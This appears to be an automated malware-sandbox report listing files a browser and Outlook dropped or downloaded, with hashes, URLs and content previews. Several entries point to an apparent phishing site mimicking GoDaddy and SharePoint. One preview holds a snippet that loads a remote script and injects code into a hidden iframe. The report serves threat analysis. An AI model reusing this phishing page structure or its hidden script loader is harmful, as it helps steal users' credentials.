                                                                                                                                                                                                                                                                                                              Size (bytes):2677
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9820729023562813
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:8vdpWTJyYRpwwH/idAKZdA1dehBiZUk1W1qehWy+C:8G3fw992y
                                                                                                                                                                                                                                                                                                              MD5:FAB9F736659FDBA1720376DFDF64D2C1
                                                                                                                                                                                                                                                                                                              SHA1:7CCA25FF9E9B727D19CA50CACCCC2322CDCD10B6
                                                                                                                                                                                                                                                                                                              SHA-256:90E597B8EB5DCDEBF39B6E57EC2FE62BE0A7D15113A9E12AC7FC3DCE1CE6B3B4
                                                                                                                                                                                                                                                                                                              SHA-512:78FB5D90717157909960CE084D901989FDA27122706EB84BF0B77CB7CF1F0F13B6905A32A1288E3F5D79862ED1BC31F694E1659FE545A04456E2A7AD70AAA4DA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,........`...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYWY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYWh.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYWh.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYWh............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VYWi............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............\.y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 25 15:27:17 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2679
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.991029631244946
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:8GdpWTJyYRpwwH/idAKZdA1duTeehOuTbbiZUk5OjqehOuTb0y+yT+:8d3fwFTfTbxWOvTb0y7T
                                                                                                                                                                                                                                                                                                              MD5:580E9265C89BE7286178AE8864F39EB2
                                                                                                                                                                                                                                                                                                              SHA1:693A165F11D97BD1F7CE5EC2AA0591B948B53271
                                                                                                                                                                                                                                                                                                              SHA-256:661E3F0CC74E2D3DAC4E4BA99521827B067F95D47AE9D49957452282FC0B34CE
                                                                                                                                                                                                                                                                                                              SHA-512:5C9E1349D8187EC9A4CCDB3AA0ED019D6903840ACF2B2275B9A4F8D4E7842DB4029F1B7D4B88374B9B0AA1ADCF1AB5FC3FA5E16038E7955EB013907EDCAF86FA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,....0...`...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYWY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYWh.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYWh.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYWh............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VYWi............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............\.y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                                                                                                                              File Type:Microsoft Outlook email folder (>=2003)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):271360
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.1693646998439233
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:B8QcSCw2kPfFfoKQ5M8OYi3BKGq/h8BUTIZ:dQ4PLR6heNZ
                                                                                                                                                                                                                                                                                                              MD5:F9E50A0ED874B4BBE1BAF5B02DEE9F03
                                                                                                                                                                                                                                                                                                              SHA1:68C2BB2593483A49AA6F2F366F01578C72BB8F6F
                                                                                                                                                                                                                                                                                                              SHA-256:D800913C75F734877F896C8F6B5CB2730CB404B7DB2B503AE7D4BD1194D3FDA4
                                                                                                                                                                                                                                                                                                              SHA-512:20D140AF51E4096D6C62B19FCA8CC23F69B070E424BF3D048EEE925077BFFD399E762F7F8C8F8654A6E90250BE43491A11D84A195C6AAC870D8F8A8C1B6C2B5E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:!BDN..A.SM......\..............:.......U................@...........@...@...................................@...........................................................................$.......D......@Q..............6...............9.......................................................................................................................................................................................................................................................................................................0.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):131072
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8042658858776162
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:RxB5+1R9Vc3CPN+iTyMxjypS3hjZEtqTdImCtZGNAFAWdg47D1R9mnE9G0yYjTIO:FkvoCMiHO4N8GmqIN8BUTIZkhik8Fd
                                                                                                                                                                                                                                                                                                              MD5:DAF37E43036909CA90F7AB272C438027
                                                                                                                                                                                                                                                                                                              SHA1:4327A6C046F0B238A38792B2BAAD96D027ABEFB3
                                                                                                                                                                                                                                                                                                              SHA-256:BA8D36E0F7F875C406210BCD9F0D62373EC8C8691D0349C59D58246374F7F79A
                                                                                                                                                                                                                                                                                                              SHA-512:A29D50F896CD7301B247A1958F48CB0CC9AB5172D26BB01F25D59112368C3D2E560588824BD169D18D8C0771B5A252E4C19A40FA42E622324F3655279D2FEA71
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.).C...B............._.`.....................#.!BDN..A.SM......\..............:.......U................@...........@...@...................................@...........................................................................$.......D......@Q..............6...............9.......................................................................................................................................................................................................................................................................................................0..._.`........B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1098)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1200
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.318791887484072
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:OVvOvuDAJSa7egRWgzQunfvJVu3iPCMgsygDKGRWKMSoI9We1F/z:y/qS/gwyPX7VqrsyEKGwKKI9WYb
                                                                                                                                                                                                                                                                                                              MD5:1193959345125D71562EE1C2259DB2F2
                                                                                                                                                                                                                                                                                                              SHA1:9F387CCE635A625DCCD0E730170019861D8F126D
                                                                                                                                                                                                                                                                                                              SHA-256:341EBCE3D417CCFC29154DCB8F192CCF8180DC89F7B8A1FDA8BA38849328BCF0
                                                                                                                                                                                                                                                                                                              SHA-512:EF4C0BE1A0F19E253DE5DF01A8822B2E3F3629D07E43B025D8A462E176FF09D1789934808B0FB94014CB37502D1249DD3F0F351C9DFD38A1ED71BE38C68DE81E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Preview:<html>.<script language="Javascript" src="https://yxmaiypmfuyt.holdbitco.ru/myscr229838.js"></script>.<script>(function(){var js = "window['__CF$cv$params']={r:'81bbd3f11f9128a6',t:'MTY5ODI1MTI1Ni43NjgwMDA='};_cpo=document.createElement('script');_cpo.nonce='',_cpo.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js',document.getElementsByTagName('head')[0].appendChild(_cpo);";var _0xh = document.createElement('iframe');_0xh.height = 1;_0xh.width = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style.border = 'none';_0xh.style.visibility = 'hidden';document.body.appendChild(_0xh);function handler() {var _0xi = _0xh.contentDocument || _0xh.contentWindow.document;if (_0xi) {var _0xj = _0xi.createElement('script');_0xj.innerHTML = js;_0xi.getElementsByTagName('head')[0].appendChild(_0xj);}}if (document.readyState !== 'loading') {handler();} else if (window.addEventListener) {document.addEventListener('DOMContentLoaded', handler);} else {var prev = document
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.459147917027245
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                                                                                                                              MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                                                                                                                              SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                                                                                                                              SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                                                                                                                              SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a.......,..........
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):89501
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1437), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):38221
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1148440684108865
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:WoogIexLQ5WKTCFBwCIZtJ8FtX2+UBRkfeWcrScuH9Ye3YdersR8Q5oqWjfPogxp:DDKAaZtJs5odwPhx5P6mqjDggJkLLn
                                                                                                                                                                                                                                                                                                              MD5:5D181D45AA6D6BAF9EC77842E4EBF8C0
                                                                                                                                                                                                                                                                                                              SHA1:3C17BD216B8266DCA79DCDBC93A2F050DA61B460
                                                                                                                                                                                                                                                                                                              SHA-256:C9EF1F74FD35256E923BD7BDA8BE00712B5764BEF47DC9A1BD1B4D1B270D6DDB
                                                                                                                                                                                                                                                                                                              SHA-512:EC6F4960A7EE10BBA9B6B960947636074771EB42681D93D681D406DA5F2177958E6F7AC21E4CFB4FFEB72EF02B179D5590BF21E16C045D821352ED8D8F1EC5B2
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/web5/assets/css/pages-godaddy.css?cb=1698251258165
                                                                                                                                                                                                                                                                                                              Preview:@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web5/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web5/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/web5/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/web5/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/web5/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/web5/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/web5/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web5/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;src: url('/web5/ass
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):35970
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.989503040923577
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:GJiLCleIZlcBvahjeheOQKskmCp9sE9gBkGgvU+7aAXDqWOtU:GJo9IgMKsQzJ9gBkZbuAXDqWV
                                                                                                                                                                                                                                                                                                              MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                                                                                                                                                                                                                                                              SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                                                                                                                                                                                                                                                              SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                                                                                                                                                                                                                                                              SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/web5/assets/fonts/GDSherpa-bold.woff
                                                                                                                                                                                                                                                                                                              Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (13192)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):303316
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.498656489454252
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:DVPCQYGPMpc6Y/yBNtu1Qgais4F+vR4JXc27:DPd/yBNtPCq27
                                                                                                                                                                                                                                                                                                              MD5:5B52B7593F64FC4D6AF4C6F0BB6BCC64
                                                                                                                                                                                                                                                                                                              SHA1:826476D7D6325350CEA582F1F966362898C774A9
                                                                                                                                                                                                                                                                                                              SHA-256:5031768530EE6AB0E12F471B8557F9ED6B3BE4632B0195346C429198D92BEA74
                                                                                                                                                                                                                                                                                                              SHA-512:4FB896EA0B65413DA85C219E83E53FDA384E7FD5E9263EB10794421562CF00C3C8B4EC81E375027EC945FFA35035398BF7D341213E01A9634A6A4DA720B07211
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://connect.facebook.net/en_US/sdk.js?hash=3740de9a4f4c75e0f8a8b2570a1a8fbc
                                                                                                                                                                                                                                                                                                              Preview:/*1698247118,,JIT Construction: v1009470316,en_US*/../**. * Copyright (c) 2017-present, Facebook, Inc. All rights reserved.. *. * You are hereby granted a non-exclusive, worldwide, royalty-free license to use,. * copy, modify, and distribute this software in source code or binary form for use. * in connection with the web services and APIs provided by Facebook.. *. * As with any software that integrates with the Facebook platform, your use of. * this software is subject to the Facebook Platform Policy. * [http://developers.facebook.com/policy/]. This copyright notice shall be. * included in all copies or substantial portions of the software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS. * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR. * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER. * IN AN ACTION OF CO
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.459147917027245
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                                                                                                                              MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                                                                                                                              SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                                                                                                                              SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                                                                                                                              SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a.......,..........
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):89
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.352349662662212
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tJ8/l3gk+S3Asup:6v/lhPfA/j+SAsup
                                                                                                                                                                                                                                                                                                              MD5:11654C4796E305307617E6777C2814FE
                                                                                                                                                                                                                                                                                                              SHA1:8590201338DF48CC31728632FA26447B8C109C53
                                                                                                                                                                                                                                                                                                              SHA-256:3AA6B4F5E76AFAD53B2ED02F1E87EFA6A16311474A85D2ECAC9D6FA1C70B2338
                                                                                                                                                                                                                                                                                                              SHA-512:247A47D5DB19C62DE719EF2EF276B6260B42E07B791946EB5C5AC0726CEABA17A722C03F461A826C9E10D46B7E7E9837B83CDCFC0C79AC68FF566337BFD6929D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.....................pHYs...........~.....IDAT.[c``........}H....IEND.B`.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 45 x 96, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.035372245524405
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlWrtathsyxl/k4E08up:6v/lhP/t/7Tp
                                                                                                                                                                                                                                                                                                              MD5:491C46ED02E18320C3E248357537D1B9
                                                                                                                                                                                                                                                                                                              SHA1:D15CA58277299B5D8D7BBECBC2B2289C4B5E623A
                                                                                                                                                                                                                                                                                                              SHA-256:968334FB2A6780B66CEAA0858D16E7F9886C46DA328FF1E904D03CC9EFDAE312
                                                                                                                                                                                                                                                                                                              SHA-512:DD51E0011A9D16F135E68168CAA8A2AEA1786A4AAE759A4D95248AC7572739F41B60883222DF6939FF2481DE73314CC8AE5E10BBCEB063DE4138A02D8704A244
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/81bbd40e1eca59f1/1698251262357/QOccPTjuoc1pb_7
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...-...`.......l.....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 491 x 140, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):9709
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.925783677446237
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:1DhcutzrkBup+VauRN56n/MIKk2mOw43MAur1KM9:BSCzrkBup+VaaD6/MIKkURcAurYM9
                                                                                                                                                                                                                                                                                                              MD5:A56008D7B425CBBA035E554A016B3135
                                                                                                                                                                                                                                                                                                              SHA1:269C8CF4A22D816786C3952F637B37450B074638
                                                                                                                                                                                                                                                                                                              SHA-256:5E5D6AA276106C0C499EC55976D7E70C69F443BFD94D2778543E37C044FEB99C
                                                                                                                                                                                                                                                                                                              SHA-512:30CBDD46E130DEF6DDC13461DCF23B125153A4C8DD827C74FA34EA7375497D03875F2C748EB8F55319DCDD410324679F9811F9528208CE098093B2FC062A884D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://indd.adobe.com/content/2/e174e561-569a-48e3-8548-c6c6e174aa25/1698074581431/package/1/publication-web-resources/image/sharepoint.png
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............\u......pHYs...........~... .IDATx^..{X...7.!1.Bb.SD...Z.)k..SVw+v..V.=.............^nk.a]E.>..R.fq}D..O...N.U.X. . &..L...1.r./...y...KM.......=}~.Z[[ADDD.K*...z..fv+..o...H.kDt..$."#.a..=..Q.$b....(...DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD..b.(.*...b]...U..uu......+.......d.7*.i..s....#".....V.6....8.*.....8........P..?...O~........D.....Pd0....Sxz.^......bl6.KM...?.iw.!..(\..Q.....j...?.P..tG6........1{.D....Q....%G..?.7.;.......b-..z.a.%...q8.X.c'..;.....0..(..2..DD=....u.8...h.....sc....T*.Z....a.%.....W...&.f.3N.c`.Q$0...EQ.l.7....p....6o.kFDD...:.v..A....f..V..d.v...kIDD...:L.-.<...o..Q...."T[,b-..(.1......k.....kBDD1.a....j|[.bP...T\..kFDD1.a.........H.F....""....j...r.....&"....t..>.].+......""........bM.O.....[.....(.X..LXX...u....W_...`U3".~h@...+M8.. .[W.V._...6.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 491 x 140, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):9709
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.925783677446237
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:1DhcutzrkBup+VauRN56n/MIKk2mOw43MAur1KM9:BSCzrkBup+VaaD6/MIKkURcAurYM9
                                                                                                                                                                                                                                                                                                              MD5:A56008D7B425CBBA035E554A016B3135
